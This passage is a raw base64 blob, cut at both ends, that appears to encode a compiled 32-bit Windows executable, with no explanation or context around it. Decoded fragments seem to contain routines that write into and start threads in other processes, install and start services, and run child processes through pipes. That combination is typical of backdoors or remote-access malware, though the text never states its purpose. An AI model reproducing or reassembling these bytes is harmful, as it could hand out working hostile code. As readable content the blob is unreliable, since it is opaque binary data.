///dRP/tVz7//9XVlDogCUBAIPEEOsb/7VY+////7Vc+///aGTFAhBWUOhjJQEAg8QU6OGDAABoWCwDEP81XCwDEI2FTPv//1BTU42FePv//1BqG1rosn4AAFD/NaBfAxD/FchiAhCL8FboO/7//4uFVPv//1mNSAGKEEA603X5/7Vk+///K8H/tWD7//9Q/7VU+///Vv8VzGICEFb/FdRiAhCNhVT7///oOGUAAIkdqF8DEOiAgwAAi038X14zzVvoiCIBAMnDVYvsUYM9pF8DEABWvgAAIAB1DFboWSMBAFmjpF8DEI1HBDvGd02hqF8DEI1EOAQ7xnYF6O/9//9X6BwNAgCLDaRfAxCLNahfAxCJBA5X/3UIg8YEjQQOUOg3jwEAA/eDxAyDfQwAiTWoXwMQdAXotP3//15ZXcNVi+yB7EwFAAChEAADEDPFiUX8i0UIU1ZXM9tqCIvxWYmF6Pr//zPAjb3E+v//aP8DAACJncD6///zq42F+fr//1NQx4W4+v//XMUCEImdvPr//8eF5Pr//wABAACJnez6//+JnfT6//+JnfD6//+Infj6///og6ABAKGkmAMQg8QMjb3A+v//6KFjAABWvljFAhBWvwAEAABX/7XI+v//6K4jAQCDxBBTU/81pJgDEGiomAMQagxa6BB9AABQjY3A+v//6JtcAACLhcT6//+DxBSNSAGKEEA603X5K8GNhfj6//91E/+1yPr//1ZXUOhfIwEAg8QQ6xv/tcT6////tcj6//9oZMUCEFdQ6EIjAQCDxBRoWCwDEP81XCwDEI2FuPr//1BTU42F+Pr//1BqGlrolnwAAFD/NaBfAxD/FchiAhCL+FfoH/z//4uFwPr//1mNcAGKCEA6y3X5/7XQ+v//K8b/tcz6//9Q/7XA+v//V/8VzGICEI2FwPr//+gjYwAAU42F5Pr//1CNhfj+//9QahNX/xXcYgIQhcB1D1f/FdRiAhCDyP/pvgAAAI2F+P7//1DoMScBAFk9yAAAAHQRg8v/V/8V1GICEIvD6ZkAAABTU42F7Pr//1BX/xW8YgIQhcB0fIuF7Pr//zvDdnI7RQxzbTldDHbKi7Xw+v//jYX0+v//UIuF6Pr//2gAEAAAA8ZQV/8VwGICEIXAdBk5nfT6//90EQO19Pr//4m18Pr//zt1DHLBO3UMc4ZX/xXUYgIQ/3UMagta6Ht7AACLnej6//9Qi87oXGAAAFlZ6wlX/xXUYgIQM8CLTfxfXjPNW+iVHwEAycNVi+xW6FSAAAD/dRCLTQj/dQzobf3//1lZi/DoXoAAAIvGXl3DVYvsgeyYAQAAoRAAAxAzxYlF/IM9rF8DEAF0R42FaP7//1BoAgIAAP8VOGMCEIXAfQ3/FfxiAhBqAejrKAEAahRaxwWsXwMQAQAAAOjEegAAahNao7BfAxDot3oAAKO0XwMQi038M83oAR8BAMnDVYvsUeiI////aAABAAD/dQj/FfBiAhCFwHUo/3UI/xUAYwIQhcB0G2aDeAgCdRSLQAyDOAB0DIsA/zD/FfRiAhDrBbhsxQIQWV3DM8BqGlBQo6whAxDoffH//4PEDMNVi+yB7AQEAAChEAADEDPFiUX8gf7/AwAAi0UIfyZWUI2F/Pv//1DociEBAIPEDI2F/Pv//1DGhDX8+///AP8VpGECEItN/DPN6FIeAQDJw1WL7F3pWyMCAFWL7FGNRfxqBFDoO4gAAItF/FlZycNVi+yD7BRWjUXw6KRKAACL8OipSgAAo6whAxDon0oAAKOUXwMQhcB2BYP4Y3YHgyWUXwMQAF7Jw1WL7IHsbAQAAKEQAAMQM8WJRfiLRQhTV2pEX1eJhfD7//8z242FlPv//1NQ6LacAQCJvZT7//8zwI294Pv//6urq6uDxAyNhZT7//9Q/xWgYQIQM8CB/v8DAADHhcD7//8BAQAAZomFxPv//4md0Pv//4md1Pv//4mdzPv//39IVv+18Pv//42F9Pv//1DoZCABAIPEDFNTjYXg+///UI2FlPv//1CNhfT7//9WUIicNfT7///oYVcAAIPEGI2F4Pv//+gPOAAAi034XzPNW+glHQEAycNVi+yD7HRTVldqRF5WM9uNRZBTUOj4mwEAM8CNfdyrq6urg8QMjUWQUIl1kP8VoGECEIldzIld0IldyDPAuwAgAABTx0W8AQEAAGaJRcDo60gAAIvQWYvziVX86KtJAACLTQyLVQiL+I1F7Og1SQAAi/DoOkkAAIvwU41F7FCL3+jzSQAAWYvHWY1IAYoQQITSdflWagArwWoQjU3cUY1NkFFQV+g4VQAAi3X8g8Qc6MpIAACNRdzoRTcAAF9eW8nDVYvsVos1sGECEFcz/1dXav//dQhXV//Wg/j/dBk7RRBzFP91EP91DGr//3UIV1f/1jPAQOsCM8BfXl3DVYvsg+w0U1ZXaABMAADoLkgAAIv4Wb4AQAAAi9fo7EgAAL4ABAAAiUX06N9IAACL2Ild8OjVSAAAiUX46M1IAACLTQyLVQiJRfyNReDoVkgAAFZQ6CJJAABZWYXAdG6LXfiNReBWUOgPSQAAWVmFwHRbi138jUXgVlDo/EgAAFlZhcB0SItd9I1F4GgAQAAAUOjlSAAAWVmFwHQx6E98AACNRdBQagBT/3X8/3X4/3Xw6JYUAACDxBjoU3wAAIv36LxHAACNRdDoNzYAAF9eW8nDVYvsg+xwVldqRF9XM/aNRZBWUOgqmgEAiX2QM8CNfdyrq6uDxAyraAAAEACNRexQjUX8UI1F+FCJdfDHRewMAAAAx0X0AQAAAP8VlGECEI1FkFD/FaBhAhAzwGaJRcCLRfxWiUXMiUXQahCNRdxQjUWQUP91DMdFvAEBAAD/dQiJdcjo7lQAAIPEGIXAdChoECcAAP913P8VzGECEP91/I113P91+IPsEIv8paWlpejTNQAAg8QYX17Jw1WL7IPsLFNWV2gAgAAA6KFGAACL0L8AIAAAWYv3iVXo6FxHAACL2Ild9OhSRwAAiUX86EpHAACJRfjoQkcAAItNDItVCIlF8I1F2OjLRgAAV1Dol0cAAItd+I1F2FdQ6IpHAACNddjo9EYAAFf/dfwPt9j/dfTowRsAAIt18IPEHFf/dfxXVuhSJAEAV/91+FdW6EckAQCDxCD2wwF0LY1F7FDo1xsAAIvGWY1QAYoIQITJdfkrwkBQVuiG/v///3Xs6N0bAACDxAzrGIvGjVABighAhMl1+SvCQFBW6GP+//9ZWYt16OgIRgAAX15bycNVi+yD7BRTVr4ABAAAVuiBGgEAi9hZhdt0dYtNDItVCI1F7OgCRgAAVlDozkYAAFlZhcB1CFPofBkBAOtR/3UQU+gvJQEAi/BZWYP+/3QphfZ0JVaNRezose///1BqAY1F7OhERgAAUOiBJgEAVuh0JwEAg8QU671T6DkZAQBZ/xWcYQIQUGoI6EHy//9ZWV5bycNVi+yB7DQIAAChEAADEDPFiUX8U1ZXvv8DAAAz21aNhfn3//9TUIid+Pf//+jSlwEAg8QMVo2F+fv//1NQiJ34+///6LuXAQCLTQyLVQiDxAyNhdD3///oO0UAAEZWUI2d+Pf//+gARgAAWVmFwA+EBAEAAI2F0Pf//1ZQjZ34+///6ONFAABZWYXAD4TnAAAAizUgYgIQM9tTaIAAAAJqA1NqAWgAAACAjYX49///UP/Wi/g7+3Ud/xWcYQIQUI2F+Pf//1BqMeic8f//g8QM6aMAAACNheD3//9QjYXo9///UI2F8Pf//1BX/xWMYQIQhcB1Gf8VnGECEFBqCeg48f//WVlX/xWIYQIQ62pXiz2IYQIQ/9dTaAAAAAJqA1NqAmgAAABAjYX4+///UP/Wi/A783UP/xWcYQIQUI2F+Pv//+uAjYXg9///UI2F6Pf//1CNhfD3//9QVv8VxGECEIXAdRD/FZxhAhBQagroyPD//1lZVv/Xi038X14zzVvokBcBAMnDVYvsgewECAAAoRAAAxAzxYlF/Gj/BwAAjYX99///agBQxoX89///AOhPlgEAg8QMjYX89///UGgACAAA/xWQYQIQhcB2EmoTUI2F/Pf//1DoEur//4PEDItN/DPN6CwXAQDJw1WL7IPsFFaNRfDonUMAAIvw6KJDAABQ/xUkYgIQXsnDVYvsg+wYoRAAAxAzxYlF+FZqAGoBagLo5gECAIvwg/7/dQWDyP/rTVfowgECAIXAdPEPv0gKi0AMUf8wjUXsUOjTgwEAg8QMagJY/3UIZolF6OiNAQIAZolF6moQjUXoUFbooQECAIXAdAhW6IsBAgDrsIvGi034M81e6IoWAQDJw1WL7IPsLINN6P9Tix3IYQIQVlf/04tNDItVCIv4gcdg6gAAjUXYiX306NxCAABQ6OlDAABZjXXYiUX46NZCAACJRfyLxuhBQwAAiUXsi8bomez//4lF8Oi+9v///9OLNSRiAhA7x3Mz/3X8i3346Av///+L+FmD//91EGjoAwAA/9b/0ztF9HLf6xNqAP918P917Ffo2wACAOsLi33oakboZ+///1lo6AMAAP/WV+jHAAIAX15bycNVi+yB7KwAAAChEAADEDPFiUX8g6Vs////AFNWV4s9yGECEP/Xi00Mi1UIi/CNhVT///+BxmDqAADoFEIAAGiAAAAAUI2deP///+jWQgAAWVmNhVT////od0IAAImFZP///42FVP///+jI6///iYVw////M9uNhXj///9QjY10////6As0AABZhcB1Sf8VnGECE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